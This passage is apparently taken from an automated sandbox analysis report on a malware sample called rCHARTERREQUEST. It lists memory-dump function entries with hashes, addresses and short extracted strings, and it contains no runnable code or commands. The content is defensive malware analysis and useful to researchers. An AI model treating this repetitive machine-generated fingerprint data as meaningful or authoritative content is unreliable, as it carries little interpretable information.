                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8b3d51809fb0ca975723449871edf7d15ccb8a6c8db28a2cacdea38f59ed80c8
                                                                                                          • Instruction ID: 6e982b2ee13f9192d9c0f42ded6e2655cb12602097cf0e61d4e4f2ea929019fa
                                                                                                          • Opcode Fuzzy Hash: 8b3d51809fb0ca975723449871edf7d15ccb8a6c8db28a2cacdea38f59ed80c8
                                                                                                          • Instruction Fuzzy Hash: FBE01734A0120DEFCB40EFA8E94069DB7FAEB85304F1085A8D809E7744EA316E009B91
                                                                                                          Function 06D4EA40 Relevance: .0, Instructions: 17COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f2e9da821f9b42713d0f08b74072b93dd7614e9dc91c4ee0bc95dbe3dbd8747d
                                                                                                          • Instruction ID: 2b3650cfa536ff0c4cc35f417ea3a2551de284c4c763a48ac58c0615c2227c4b
                                                                                                          • Opcode Fuzzy Hash: f2e9da821f9b42713d0f08b74072b93dd7614e9dc91c4ee0bc95dbe3dbd8747d
                                                                                                          • Instruction Fuzzy Hash: ACD05E3090A108EBC784DB94D501A68B7BCFB4A214F10A09C981857341CA32AE02D781
                                                                                                          Function 06D4DA60 Relevance: .0, Instructions: 17COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f2e9da821f9b42713d0f08b74072b93dd7614e9dc91c4ee0bc95dbe3dbd8747d
                                                                                                          • Instruction ID: d139abf7cab43f99771f28d63202f4877aadf3ee4e397bf029edf8003fd3c8f3
                                                                                                          • Opcode Fuzzy Hash: f2e9da821f9b42713d0f08b74072b93dd7614e9dc91c4ee0bc95dbe3dbd8747d
                                                                                                          • Instruction Fuzzy Hash: 90D05E7050A108EBCB84DB94D501A68B7BDDF4A218F10909C980857351CA32EE02D781
                                                                                                          Function 0180C640 Relevance: .0, Instructions: 17COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6383b0e77bed030bee15896211499f82582f548a8789d2bef88fcef793f7c96e
                                                                                                          • Instruction ID: fb3f375019c8069c52e8e94f8b26aec88e24af1868ccf0b1a1e086304774b928
                                                                                                          • Opcode Fuzzy Hash: 6383b0e77bed030bee15896211499f82582f548a8789d2bef88fcef793f7c96e
                                                                                                          • Instruction Fuzzy Hash: 8BD05E3050A10CDBC794CE98DD00A68B7ACDB4A318F20A1DC982997381CB32AE02DB80
                                                                                                          Function 06D38C6D Relevance: .0, Instructions: 16COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6d7c4b933c5da7b0ca99f54d8ca8265b28fcee0265e7d72ea8224853a6d66f4c
                                                                                                          • Instruction ID: 0b7cb561af582fa7c0924bbdd8626ee16a3a0534e6a6f48b0d88dad0104abb27
                                                                                                          • Opcode Fuzzy Hash: 6d7c4b933c5da7b0ca99f54d8ca8265b28fcee0265e7d72ea8224853a6d66f4c
                                                                                                          • Instruction Fuzzy Hash: 4AE01AB8A041588FC7A4DF24D48479CBBB2FB85304F108499E50EB7390CA799DC98F41
                                                                                                          Function 06D38C17 Relevance: .0, Instructions: 16COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 134de2c64998658fe7907125d889e545c5c4fe7a36a8e530a6a975459adc21fc
                                                                                                          • Instruction ID: 6dd447d54ba477c84d003b9f95ef418ad7d45ed160e933315898b68ed14edbff
                                                                                                          • Opcode Fuzzy Hash: 134de2c64998658fe7907125d889e545c5c4fe7a36a8e530a6a975459adc21fc
                                                                                                          • Instruction Fuzzy Hash: 34E09AB4A052199FCB64DF24DA9479DB7B2FB85304F100099E64A77394CB395EC49F12
                                                                                                          Function 06D38A7B Relevance: .0, Instructions: 16COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3ba1831ea09128469da81f9847e03c80b88d8e2a1667b3d693f9a960327ce5c3
                                                                                                          • Instruction ID: 803488f251afd8daf4ba598ca5e9b229def7b0bcb3d286363faa7a9988c0644e
                                                                                                          • Opcode Fuzzy Hash: 3ba1831ea09128469da81f9847e03c80b88d8e2a1667b3d693f9a960327ce5c3
                                                                                                          • Instruction Fuzzy Hash: 29E0E5B4A442188BD728DF29E4947ECB7B2EB86305F108099E60A77280CB385E859F91
                                                                                                          Function 06D38B73 Relevance: .0, Instructions: 16COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5589ccc6fc63da8ca8d5c087ce2be12ede70afb56ff1f75b08da5f4f529260e3
                                                                                                          • Instruction ID: d4357048214a4f933c1ac85d5baa3d76321c9bcd108c20d3f191dc891c90bfa4
                                                                                                          • Opcode Fuzzy Hash: 5589ccc6fc63da8ca8d5c087ce2be12ede70afb56ff1f75b08da5f4f529260e3
                                                                                                          • Instruction Fuzzy Hash: 36E01AB4A002188FC764EF64D5847ADBBB2FF85304F004099E14A73384CB381D848F10
                                                                                                          Function 06D46F59 Relevance: .0, Instructions: 16COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f4d34af1cab804e853603f628c1fca81ff84fe842a4829d70b78b302ae6f2c9e
                                                                                                          • Instruction ID: d7363ebd295d5aa52fe3bc94d98181dfe3d8bb2f7e35b983e58a5ee2eb29c919
                                                                                                          • Opcode Fuzzy Hash: f4d34af1cab804e853603f628c1fca81ff84fe842a4829d70b78b302ae6f2c9e
                                                                                                          • Instruction Fuzzy Hash: 1DD0C7724053546FC3559B14DC10C627F78DB5625030681D2F9599B332C1269D1487E1
                                                                                                          Function 06D45041 Relevance: .0, Instructions: 16COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e6dd5582d6e3de9c08bdbaafc1ebb1fa96acb3fb2015a1f08f7baf62b7468df1
                                                                                                          • Instruction ID: 43733a2e08a46fa0c73bd0c50846132cc832ca57035b358d2c6d4553908c40cb
                                                                                                          • Opcode Fuzzy Hash: e6dd5582d6e3de9c08bdbaafc1ebb1fa96acb3fb2015a1f08f7baf62b7468df1
                                                                                                          • Instruction Fuzzy Hash: 24D0C976449254AFC3428B26D815CC27F799F166607464292F9448BA73C3269E14C6A1
                                                                                                          Function 06D49130 Relevance: .0, Instructions: 15COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8d68b7e241d7eb719b192cb31bd2346abaf0f49e9bd6c265cf282df243dd8ebc
                                                                                                          • Instruction ID: feefb2aee2cfbcabb30192808030927b6a9ce15aad03a674069ccf65f07280c3
                                                                                                          • Opcode Fuzzy Hash: 8d68b7e241d7eb719b192cb31bd2346abaf0f49e9bd6c265cf282df243dd8ebc
                                                                                                          • Instruction Fuzzy Hash: E5D022760593446FC3024A64FC1BCD23F6D8B596043068097F2080B492C663E440D3F3
                                                                                                          Function 06B8BDBD Relevance: .0, Instructions: 13COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7456609b64b587759cc535a94883907d8573948445e53e0e1cb45849028c2805
                                                                                                          • Instruction ID: dae3c0ba72803bc0bf0329ce40aa44f3b2a876090da659632c184afc076f0838
                                                                                                          • Opcode Fuzzy Hash: 7456609b64b587759cc535a94883907d8573948445e53e0e1cb45849028c2805
                                                                                                          • Instruction Fuzzy Hash: 2DD067B4F0421D8FDB54DF65D458B9E77B1FB8A309F101254D11577344C7385844DB55
                                                                                                          Function 06D3C9E0 Relevance: .0, Instructions: 13COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8beb7d474a2808b118f64742b26120735bd001e335f66c5dd050779e40ad4011
                                                                                                          • Instruction ID: b363443c1858acf865342f71c31c76a481b01659b9cd824db5841f5aece7fc59
                                                                                                          • Opcode Fuzzy Hash: 8beb7d474a2808b118f64742b26120735bd001e335f66c5dd050779e40ad4011
                                                                                                          • Instruction Fuzzy Hash: 11C04C7054B3C02FDB530A314C17B953E261B43B41F9E11D6B6819FDD38186154586B2
                                                                                                          Function 06D3F8E1 Relevance: .0, Instructions: 12COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: da06c04a7c8d8c6a558736e6f5a5342ffad2536b4b199a30a6eba4badefc73ba
                                                                                                          • Instruction ID: 9b535cf156194a1d710a1c3641cb8bb394ad8e16798b911e47d9cb8f357e07cf
                                                                                                          • Opcode Fuzzy Hash: da06c04a7c8d8c6a558736e6f5a5342ffad2536b4b199a30a6eba4badefc73ba
                                                                                                          • Instruction Fuzzy Hash: 2FC08CBF50E3906FC38746319D1A8CB7F259AA26483024292B0808B0E2D2B00F60C7AA
                                                                                                          Function 01801356 Relevance: .0, Instructions: 11COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: feea162ffd18df34aae9f5b9aa2105eff2eb3105eda110dbd8d238cbaf0e4daa
                                                                                                          • Instruction ID: a47b4e83ad632564137728c6ed10913e96f3ae0022024c2c10d2afe9ee102478
                                                                                                          • Opcode Fuzzy Hash: feea162ffd18df34aae9f5b9aa2105eff2eb3105eda110dbd8d238cbaf0e4daa
                                                                                                          • Instruction Fuzzy Hash: E2D0A731600118CAD76ACF15CC182A8B2A07B0535170A85B0D547E7041D730EB069FC1
                                                                                                          Function 018074A8 Relevance: .0, Instructions: 11COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 69f43cc6dd7f80b9198049c6e0f308888281c1836ec888389806d8e0ad49ead6
                                                                                                          • Instruction ID: c5bcca33daca1a8e0c0557466ea2defc88b82779f01663e059ef1bf54ee98660
                                                                                                          • Opcode Fuzzy Hash: 69f43cc6dd7f80b9198049c6e0f308888281c1836ec888389806d8e0ad49ead6
                                                                                                          • Instruction Fuzzy Hash: 48C08C30002A0D8AD1E53BECA90932C3A98AB04315F012000AE1C64491CE642544A33B
                                                                                                          Function 0704733E Relevance: .0, Instructions: 10COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bab4ecaf84c210a8bfc1e9cccd233652fbf33ff6a9c5d9505551cd6a4e5ab174
                                                                                                          • Instruction ID: 65bb284bfa01f8d40f94971efd65050eaa66c8e52b4bc55f5e6bfea5e1600d22
                                                                                                          • Opcode Fuzzy Hash: bab4ecaf84c210a8bfc1e9cccd233652fbf33ff6a9c5d9505551cd6a4e5ab174
                                                                                                          • Instruction Fuzzy Hash: 0FD06CB490522A9BCB29CF20C9A4AEAB7B1AB85304F1041EA841DB7700D7389EC68F40
                                                                                                          Function 06D370E5 Relevance: .0, Instructions: 10COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 34b6842d29a10e3de45b994fc00ee721a53034d8a6f95fb28b30ab326496b48d
                                                                                                          • Instruction ID: da6da3854e437c34f87b7da233c23fd4eaf96eb7efc56c1aab0aebdb522e39f4
                                                                                                          • Opcode Fuzzy Hash: 34b6842d29a10e3de45b994fc00ee721a53034d8a6f95fb28b30ab326496b48d
                                                                                                          • Instruction Fuzzy Hash: 7EC0127AE400188F8B40EBD9E8408CCB7B0EF84322B0080A2D220A7208D234292ACF90
                                                                                                          Function 018008A1 Relevance: .0, Instructions: 10COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: be7e175f9aba3254a15e1d1015a074a4c60c5b26f9b903a11ce734560e8bbee4
                                                                                                          • Instruction ID: 2f13b1e8c555fd1dd468d912654d1ac5cd30774576b64e1bd1aae2758093a916
                                                                                                          • Opcode Fuzzy Hash: be7e175f9aba3254a15e1d1015a074a4c60c5b26f9b903a11ce734560e8bbee4
                                                                                                          • Instruction Fuzzy Hash: C7C04CB66A5785EFCF531EA0B4D50D83FB4D95262131704A7F405C6052A2750A579B10
                                                                                                          Function 06C6B9E9 Relevance: .0, Instructions: 10COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5df91e22eaef57fa31817bcb6c65e81c68dcd2b82999b8c5bf248e5b23bdf6b1
                                                                                                          • Instruction ID: 89789185147e0c55f948a21f1d16fd169244ad417714e4dcc400afc67672fe17
                                                                                                          • Opcode Fuzzy Hash: 5df91e22eaef57fa31817bcb6c65e81c68dcd2b82999b8c5bf248e5b23bdf6b1
                                                                                                          • Instruction Fuzzy Hash: 15D0C970A416198FDB70CF26DE847BAB7B1FB81306F0021D5E04EA7659DB742E898F44
                                                                                                          Function 06D42B80 Relevance: .0, Instructions: 9COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 45b2101fbb7641fc69df9edb1b264d3b1df7e0d7fff4c698094fc0a33451be19
                                                                                                          • Instruction ID: 97dbfc207f79489a9718ad272c3e1bb1508280b7882c53825971c834aa04e1e0
                                                                                                          • Opcode Fuzzy Hash: 45b2101fbb7641fc69df9edb1b264d3b1df7e0d7fff4c698094fc0a33451be19
                                                                                                          • Instruction Fuzzy Hash: 12B092D190E6900EC2C22A2108210A23E2508930207D641D6AC828E8E388494A69C2A2
                                                                                                          Function 06D45050 Relevance: .0, Instructions: 8COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                                          Function 06D49140 Relevance: .0, Instructions: 7COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b570bc94e6a8c4cfcc48ca6b048bd6988e3f39727da0ae4028639a2fe4af5516
                                                                                                          • Instruction ID: 14ce2f955a225a920671f670e31880e9fb9a8770113ec2501fac483f0d6f9815
                                                                                                          • Opcode Fuzzy Hash: b570bc94e6a8c4cfcc48ca6b048bd6988e3f39727da0ae4028639a2fe4af5516
                                                                                                          • Instruction Fuzzy Hash: E3B09272040208ABC6009A94E8048A5BB6DAB586117458026B6190A1518B33A862EB95
                                                                                                          Function 018008B0 Relevance: .0, Instructions: 5COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e5169b5ac28dbbb863dc8b51e1c40ded3d72dd981bd49176ab4a7883866331fb
                                                                                                          • Instruction ID: b386d3a24235b1f8cf405e26cff9a2f040173a9b582995699b3ef23275abdb97
                                                                                                          • Opcode Fuzzy Hash: e5169b5ac28dbbb863dc8b51e1c40ded3d72dd981bd49176ab4a7883866331fb
                                                                                                          • Instruction Fuzzy Hash: 8890223000020C8FCA002380300800CBB8C80000003800000B00C800022A2020000AA0

                                                                                                          Non-executed Functions

                                                                                                          Function 01807680 Relevance: 4.0, Strings: 3, Instructions: 242COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TJcq$Te^q$xbaq
                                                                                                          • API String ID: 0-3225726259
                                                                                                          • Opcode ID: d0f7153af08bbe6a852f39285352714d8506e9bc7efd0864567cb0faa943059d
                                                                                                          • Instruction ID: abdb1363a16bd6a67e894b16a9fd73d011415a925013c15f81f4ff7b2f7c2f62
                                                                                                          • Opcode Fuzzy Hash: d0f7153af08bbe6a852f39285352714d8506e9bc7efd0864567cb0faa943059d
                                                                                                          • Instruction Fuzzy Hash: 7CC17875E016188FDB59CF6AC944ADDBBF2AF89300F14C0AAD909AB365DB305E81CF50
                                                                                                          Function 06D30040 Relevance: 3.9, Strings: 3, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TJcq$XX^q$i
                                                                                                          • API String ID: 0-1195898367
                                                                                                          • Opcode ID: 103f03cd485040118797a06fda1a6df6a302c8774b6d1a0a60848154239972ca
                                                                                                          • Instruction ID: 1ce6cf5ef392557043b81e0046624a5afec5098074448cb2d1d7fab43e66b249
                                                                                                          • Opcode Fuzzy Hash: 103f03cd485040118797a06fda1a6df6a302c8774b6d1a0a60848154239972ca
                                                                                                          • Instruction Fuzzy Hash: 4C410BB5E002288FDB59CF6BCC4069EBAF7BBC9300F14D1AA9549AB254DB345A46CF44
                                                                                                          Function 06D3F458 Relevance: 2.8, Strings: 2, Instructions: 335COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq$,bq
                                                                                                          • API String ID: 0-1616511919
                                                                                                          • Opcode ID: 2c84e38cbd480dffe7fa65a413247b8dd63a7fc2ccc98a0d92384412161d75d3
                                                                                                          • Instruction ID: 9e12890b82a2a0d55996843f1b44e48862a80d4fe8b571ccd3872516448d6a50
                                                                                                          • Opcode Fuzzy Hash: 2c84e38cbd480dffe7fa65a413247b8dd63a7fc2ccc98a0d92384412161d75d3
                                                                                                          • Instruction Fuzzy Hash: CFD10875E002198FDB54DF69C584AAABBF2FF88311F25C4A9E4059B361D735EC81CB90
                                                                                                          Function 01803818 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q$4'^q
                                                                                                          • API String ID: 0-2697143702
                                                                                                          • Opcode ID: 879449d4b15f95c8cc961b1fb6422da4f7c4e71a87f419334886cf596f11a9bf
                                                                                                          • Instruction ID: df84e1ac8ba378cc5c1ee3553937fc178ff8e35f095089a69e94787ae384cef5
                                                                                                          • Opcode Fuzzy Hash: 879449d4b15f95c8cc961b1fb6422da4f7c4e71a87f419334886cf596f11a9bf
                                                                                                          • Instruction Fuzzy Hash: AC71F774A002098FD718DF6BE98069EBBF2FBC9308F14D529D019AB368DF395849DB51
                                                                                                          Function 06C683B8 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: &Eq|
                                                                                                          • API String ID: 0-3185251701
                                                                                                          • Opcode ID: f78328225b85dfa2cfa0cfdbbbd1b63ab088ed216336d8aea25f2676d242dba9
                                                                                                          • Instruction ID: 88cfc7a01eeac3fa298253dc8be3ec9f0ab6e667ec92b4b98825d8a584bc2b6e
                                                                                                          • Opcode Fuzzy Hash: f78328225b85dfa2cfa0cfdbbbd1b63ab088ed216336d8aea25f2676d242dba9
                                                                                                          • Instruction Fuzzy Hash: EE12B471E016188FDB54CFAAC98069DFBF2BF88304F24C569E419EB21AD734A946CF54
                                                                                                          Function 06D3A991 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
